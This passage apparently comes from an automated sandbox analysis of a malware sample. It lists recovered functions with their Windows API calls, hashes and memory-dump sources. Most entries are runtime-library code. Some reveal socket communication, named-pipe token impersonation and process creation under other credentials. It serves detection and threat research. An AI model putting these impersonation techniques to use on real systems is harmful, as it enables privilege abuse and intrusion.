Instruction Fuzzy Hash: 91416171218A4686E762EB22F4403FE67B4EFC4B88F115439AECE4BA95DF38C6458705

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73C21C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA73C204: _mtinitlocknum.LIBCMT ref: 0000017DEA73FB4A
Part of subcall function 0000017DEA73C204: _amsg_exit.LIBCMT ref: 0000017DEA73FB56

DecodePointer.KERNEL32 ref: 0000017DEA73C278
DecodePointer.KERNEL32 ref: 0000017DEA73C296
EncodePointer.KERNEL32 ref: 0000017DEA73C2C4
DecodePointer.KERNEL32 ref: 0000017DEA73C2D9
EncodePointer.KERNEL32 ref: 0000017DEA73C2E4
DecodePointer.KERNEL32 ref: 0000017DEA73C2F6
DecodePointer.KERNEL32 ref: 0000017DEA73C306
__crtCorExitProcess.LIBCMT ref: 0000017DEA73C38A
ExitProcess.KERNEL32 ref: 0000017DEA73C392

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
String ID:
API String ID: 1550138920-0
Opcode ID: d7efd6195f77797d4161262abdd0b4da421aa9445d234d03ffcc64e71c179cc0
Instruction ID: fa2383eb93d58a2a79032884cb4dba0bac2ea77c1b09c0a2220b5caf37da13ac
Opcode Fuzzy Hash: d7efd6195f77797d4161262abdd0b4da421aa9445d234d03ffcc64e71c179cc0
Instruction Fuzzy Hash: 6C417B31219A0B81E643FF15F8443FA2AB4BFC8BD4F654435AACE4A765DF38C6598302

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA734B68 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 0000017DEA734BA9
htons.WS2_32 ref: 0000017DEA734BBA

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

socket.WS2_32 ref: 0000017DEA734BFC
closesocket.WS2_32 ref: 0000017DEA734C11
gethostbyname.WS2_32 ref: 0000017DEA734C30
htons.WS2_32 ref: 0000017DEA734C60
ioctlsocket.WS2_32 ref: 0000017DEA734C7A
connect.WS2_32 ref: 0000017DEA734C92
WSAGetLastError.WS2_32 ref: 0000017DEA734C9C

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastStartupclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3990436974-0
Opcode ID: 0cd43114701e1262f3a5fd96d94ee5b07d31ea31945adaa52020fa66bcd3804a
Instruction ID: ea52de3e51f3a354a19d842bc83f5fa9ceb2ea106c9a59b57841f08a798bc938
Opcode Fuzzy Hash: 0cd43114701e1262f3a5fd96d94ee5b07d31ea31945adaa52020fa66bcd3804a
Instruction Fuzzy Hash: 1431A77230865A86E626EF21F8443FAA771FB84BA5F540534DD8E4B694EE3CC789C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA34161B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA341646

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__doserrno.LIBCMT ref: 0000017DEA34163E

Part of subcall function 0000017DEA33CDE7: _getptd_noexit.LIBCMT ref: 0000017DEA33CDEB

__lock_fhandle.LIBCMT ref: 0000017DEA34168A
_unlock_fhandle.LIBCMT ref: 0000017DEA3416C4

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: 2fd7552e7a03a83772671d1ab36797b1f3930bea2a84a4ca2c1857c787e7c989
Instruction ID: e1140e160553aa8c733240ab771b4fee8e97805d39876d1c4f2c698b00a85a74
Opcode Fuzzy Hash: 2fd7552e7a03a83772671d1ab36797b1f3930bea2a84a4ca2c1857c787e7c989
Instruction Fuzzy Hash: 0321D63161CA0B0EF3576B98B8463F836F0DFC1321F190259E56D8F1E3DE6899058697

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA735200 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA735248: htonl.WS2_32 ref: 0000017DEA7352A5
Part of subcall function 0000017DEA735248: select.WS2_32 ref: 0000017DEA735313
Part of subcall function 0000017DEA735248: __WSAFDIsSet.WS2_32 ref: 0000017DEA73532B
Part of subcall function 0000017DEA735248: accept.WS2_32 ref: 0000017DEA735348
Part of subcall function 0000017DEA735248: ioctlsocket.WS2_32 ref: 0000017DEA735360
Part of subcall function 0000017DEA735248: __WSAFDIsSet.WS2_32 ref: 0000017DEA735403

GetTickCount.KERNEL32 ref: 0000017DEA735212

Part of subcall function 0000017DEA735594: malloc.LIBCMT ref: 0000017DEA7355C6
Part of subcall function 0000017DEA735594: htonl.WS2_32 ref: 0000017DEA7355F9
Part of subcall function 0000017DEA735594: recvfrom.WS2_32 ref: 0000017DEA73563D
Part of subcall function 0000017DEA735594: WSAGetLastError.WS2_32 ref: 0000017DEA73564A

GetTickCount.KERNEL32 ref: 0000017DEA73522A
GetTickCount.KERNEL32 ref: 0000017DEA735748
GetTickCount.KERNEL32 ref: 0000017DEA73575E
shutdown.WS2_32 ref: 0000017DEA73577D
shutdown.WS2_32 ref: 0000017DEA735792
closesocket.WS2_32 ref: 0000017DEA73579C
free.LIBCMT ref: 0000017DEA7357BC
free.LIBCMT ref: 0000017DEA7357D1

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
String ID:
API String ID: 3610715900-0
Opcode ID: 627dba3710d4f0c7dd1d641995000bac8284fcfa6f523cdae05f715bf1581dd1
Instruction ID: 445e0c995a25f2b5f216a270d96e80adaa264d644063145fdee8dde0ba3cc04c
Opcode Fuzzy Hash: 627dba3710d4f0c7dd1d641995000bac8284fcfa6f523cdae05f715bf1581dd1
Instruction Fuzzy Hash: 4B313A7121864BCAFB67EF61F5443B863B4EFC8BA4F2A45308A8D4E655DF34C6488742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA340E3F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA340E60

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__doserrno.LIBCMT ref: 0000017DEA340E58

Part of subcall function 0000017DEA33CDE7: _getptd_noexit.LIBCMT ref: 0000017DEA33CDEB

__lock_fhandle.LIBCMT ref: 0000017DEA340EA4
_close_nolock.LIBCMT ref: 0000017DEA340EB7
_unlock_fhandle.LIBCMT ref: 0000017DEA340ED0

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: 6cfc25cdd5b489f6688e94242b3cab24ae98c4ad259251a64ebc42d574a3c06b
Instruction ID: b00521f83dfa6ef2778a7cc928d189522baa7a3dce420d7ee1d3829b7f4068a0
Opcode Fuzzy Hash: 6cfc25cdd5b489f6688e94242b3cab24ae98c4ad259251a64ebc42d574a3c06b
Instruction Fuzzy Hash: 3F21953161DA0B5EE2176BA4B8553F979B0EFC2321F120568E02E8F1E3DE789D548253

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA743830 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA74385B

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__doserrno.LIBCMT ref: 0000017DEA743853

Part of subcall function 0000017DEA73D9A0: _getptd_noexit.LIBCMT ref: 0000017DEA73D9A4

__lock_fhandle.LIBCMT ref: 0000017DEA74389F
_lseek_nolock.LIBCMT ref: 0000017DEA7438B8

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: f9b56865d90164e51b20c2bbab125bba674e742126cc76267be3c4ade94a0bda
Instruction ID: 0773c137df1e8cc922290876a0fb53974c6c96e65e6451b0e8eed0ab37140924
Opcode Fuzzy Hash: f9b56865d90164e51b20c2bbab125bba674e742126cc76267be3c4ade94a0bda
Instruction Fuzzy Hash: D921713270854A45F703BB15B9413FE6670AFC07A1F664924AA9E0F2D7CF788A458726

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7439A8 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA7439D3

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__doserrno.LIBCMT ref: 0000017DEA7439CB

Part of subcall function 0000017DEA73D9A0: _getptd_noexit.LIBCMT ref: 0000017DEA73D9A4

__lock_fhandle.LIBCMT ref: 0000017DEA743A17
_lseeki64_nolock.LIBCMT ref: 0000017DEA743A30

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: 2915a5590191083fef4be69073d3087bf6c31db82160f2517f5d5cdc6336bfe3
Instruction ID: f2bc5ee2d1f94ab77f27f4d1807c3e12deef6ae0065d7e78abd21196e3219730
Opcode Fuzzy Hash: 2915a5590191083fef4be69073d3087bf6c31db82160f2517f5d5cdc6336bfe3
Instruction Fuzzy Hash: C321903270824A45F603BB15A8413FE7570AFC0BB1F5A5A25ADBE0F3D7CF3886418616

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33B353 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0000017DEA33B381

Part of subcall function 0000017DEA33A62F: _errno.LIBCMT ref: 0000017DEA33A64F

free.LIBCMT ref: 0000017DEA33B396
free.LIBCMT ref: 0000017DEA33B3B7
free.LIBCMT ref: 0000017DEA33B3CC
free.LIBCMT ref: 0000017DEA33B3E0
free.LIBCMT ref: 0000017DEA33B3EC
free.LIBCMT ref: 0000017DEA33B417
free.LIBCMT ref: 0000017DEA33B438
free.LIBCMT ref: 0000017DEA33B451
free.LIBCMT ref: 0000017DEA33B482

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
Instruction ID: 7a8667451bf30ff9688447a78b6c9d4cd55ae0a7039fea1e33bd1a4348744f2f
Opcode Fuzzy Hash: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
Instruction Fuzzy Hash: 98411C3065CE1E8BFBA6EF99A8957F533F0FB98311F5400289119CB1A1EE2C89598716

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7421D4 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA7421FF

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__doserrno.LIBCMT ref: 0000017DEA7421F7

Part of subcall function 0000017DEA73D9A0: _getptd_noexit.LIBCMT ref: 0000017DEA73D9A4

__lock_fhandle.LIBCMT ref: 0000017DEA742243

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: a02034d4b4650baad4229769328548c6f1890294151ac8472b2d8ade1b3a2288
Instruction ID: 53ef779157228917dd8ed886f1c92c73c5d32f7289cfe2acb09b809580899c42
Opcode Fuzzy Hash: a02034d4b4650baad4229769328548c6f1890294151ac8472b2d8ade1b3a2288
Instruction Fuzzy Hash: E321C13260814B45F603BF55B9413FE2570AFC0BA1F574924AA9D0F2D7CF788A50869A

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7464E8 Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA746501

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__lock_fhandle.LIBCMT ref: 0000017DEA746549
FlushFileBuffers.KERNEL32 ref: 0000017DEA746564
GetLastError.KERNEL32 ref: 0000017DEA74656E
__doserrno.LIBCMT ref: 0000017DEA74657E
_errno.LIBCMT ref: 0000017DEA746585

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2289611984-0
Opcode ID: 37b9bd9e17fee378057beb1ff239737341f39bc7a40d7ae34c3b228ff369500e
Instruction ID: bb8bd7d23164b776dea2f3aa4864183920de6229d8f802c0b0935b3e3e808d60
Opcode Fuzzy Hash: 37b9bd9e17fee378057beb1ff239737341f39bc7a40d7ae34c3b228ff369500e
Instruction Fuzzy Hash: 6321C23120C64B46F613FF65B9803FE6A709FC1760F150578959E0F2DBDE68CA448216

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7419F8 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA741A19

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

__doserrno.LIBCMT ref: 0000017DEA741A11

Part of subcall function 0000017DEA73D9A0: _getptd_noexit.LIBCMT ref: 0000017DEA73D9A4

__lock_fhandle.LIBCMT ref: 0000017DEA741A5D
_close_nolock.LIBCMT ref: 0000017DEA741A70

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: c172c206cd4e7ddd8af84d695408c21dd265f297318fe74827d56422459edfc6
Instruction ID: 224046d6f3614d3ec23f15be3d8f04f7f332f049c34413b44bdb6e593748f988
Opcode Fuzzy Hash: c172c206cd4e7ddd8af84d695408c21dd265f297318fe74827d56422459edfc6
Instruction Fuzzy Hash: 9911D23271C24B45F207FB65B9813FE2670AFC07A0F664934959E0F2D7DE748A444316

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72FD54 Relevance: 12.0, APIs: 8, Instructions: 45pipethreadfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000017DEA72FD7A
ConnectNamedPipe.KERNEL32 ref: 0000017DEA72FD90
ReadFile.KERNEL32 ref: 0000017DEA72FDBA
ImpersonateNamedPipeClient.ADVAPI32 ref: 0000017DEA72FDCB
GetCurrentThread.KERNEL32 ref: 0000017DEA72FDD5
OpenThreadToken.ADVAPI32 ref: 0000017DEA72FDED
DisconnectNamedPipe.KERNEL32 ref: 0000017DEA72FE03
CloseHandle.KERNEL32 ref: 0000017DEA72FE10

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientCloseConnectCurrentDisconnectErrorFileHandleImpersonateLastOpenReadToken
String ID:
API String ID: 1569842636-0
Opcode ID: dd18e85b62bb72f84cdd973b91bb500c1b818d908ed9a3d94947706d4ab7db66
Instruction ID: 99817b5c3839364e6719846df3a35212ac9b3db3a5e3d72aa80b0f911f31a8b5
Opcode Fuzzy Hash: dd18e85b62bb72f84cdd973b91bb500c1b818d908ed9a3d94947706d4ab7db66
Instruction Fuzzy Hash: E421367021894B82FB62FB21F8147FA32B0BFC0B90F544831949E4E5A1DF28C619CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA323A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA323AF0

Part of subcall function 0000017DEA33A66F: _FF_MSGBANNER.LIBCMT ref: 0000017DEA33A69F
Part of subcall function 0000017DEA33A66F: _NMSG_WRITE.LIBCMT ref: 0000017DEA33A6A9
Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A6DD
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6E8
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A6F3

malloc.LIBCMT ref: 0000017DEA323AFA

Part of subcall function 0000017DEA33A66F: _callnewh.LIBCMT ref: 0000017DEA33A703
Part of subcall function 0000017DEA33A66F: _errno.LIBCMT ref: 0000017DEA33A708

malloc.LIBCMT ref: 0000017DEA323B05
free.LIBCMT ref: 0000017DEA323CC5
free.LIBCMT ref: 0000017DEA323CCD
free.LIBCMT ref: 0000017DEA323CD5

Part of subcall function 0000017DEA324937: malloc.LIBCMT ref: 0000017DEA324981
Part of subcall function 0000017DEA324937: malloc.LIBCMT ref: 0000017DEA32498C
Part of subcall function 0000017DEA324937: free.LIBCMT ref: 0000017DEA324A73
Part of subcall function 0000017DEA324937: free.LIBCMT ref: 0000017DEA324A7B

free.LIBCMT ref: 0000017DEA323CE1
free.LIBCMT ref: 0000017DEA323CEE
free.LIBCMT ref: 0000017DEA323CFB

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 530378328aa492e52dc02055a43799409f433604a0ca5208a2b7f677f439ae0d
Instruction ID: 12684e220d54ae3997792c4ac48fdbe7d5510c9d914db8f7aee11fe101fe9290
Opcode Fuzzy Hash: 530378328aa492e52dc02055a43799409f433604a0ca5208a2b7f677f439ae0d
Instruction Fuzzy Hash: 8591B63071CB0E4BD75AAAACA4517F9B3F5EFC5700F54021ED48ECB292EE24D9068697

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA7246A9

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

malloc.LIBCMT ref: 0000017DEA7246B3

Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B2BC
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2C1

malloc.LIBCMT ref: 0000017DEA7246BE
free.LIBCMT ref: 0000017DEA72487E
free.LIBCMT ref: 0000017DEA724886
free.LIBCMT ref: 0000017DEA72488E

Part of subcall function 0000017DEA7254F0: malloc.LIBCMT ref: 0000017DEA72553A
Part of subcall function 0000017DEA7254F0: malloc.LIBCMT ref: 0000017DEA725545
Part of subcall function 0000017DEA7254F0: free.LIBCMT ref: 0000017DEA72562C
Part of subcall function 0000017DEA7254F0: free.LIBCMT ref: 0000017DEA725634

free.LIBCMT ref: 0000017DEA72489A
free.LIBCMT ref: 0000017DEA7248A7
free.LIBCMT ref: 0000017DEA7248B4

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh$AllocHeap
String ID:
API String ID: 3534990644-0
Opcode ID: 9ed940ff76df828764eb2dd6c0d9eaeab286c07fe672a7b4cb73b39db3b14b40
Instruction ID: bf78c3a7709a2bd736a07e6a18ff5fb1dda4a072a3fd539918a3fd596cf68f26
Opcode Fuzzy Hash: 9ed940ff76df828764eb2dd6c0d9eaeab286c07fe672a7b4cb73b39db3b14b40
Instruction Fuzzy Hash: 9771077231878A86EA26EA65A4407FE6BB1BFC5BC8F004135DD8E4FB85DE38C6458711

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73071C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA734720: malloc.LIBCMT ref: 0000017DEA73473C

GetStartupInfoA.KERNEL32 ref: 0000017DEA7307E4

Part of subcall function 0000017DEA72F9F4: MultiByteToWideChar.KERNEL32 ref: 0000017DEA72FA21
Part of subcall function 0000017DEA72F9F4: MultiByteToWideChar.KERNEL32 ref: 0000017DEA72FA49

GetCurrentDirectoryW.KERNEL32 ref: 0000017DEA730871
GetCurrentDirectoryW.KERNEL32 ref: 0000017DEA730880
CreateProcessWithLogonW.ADVAPI32 ref: 0000017DEA7308DB
GetLastError.KERNEL32 ref: 0000017DEA7308E5

Strings

%s as %s\%s: %d, xrefs: 0000017DEA7308EB

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

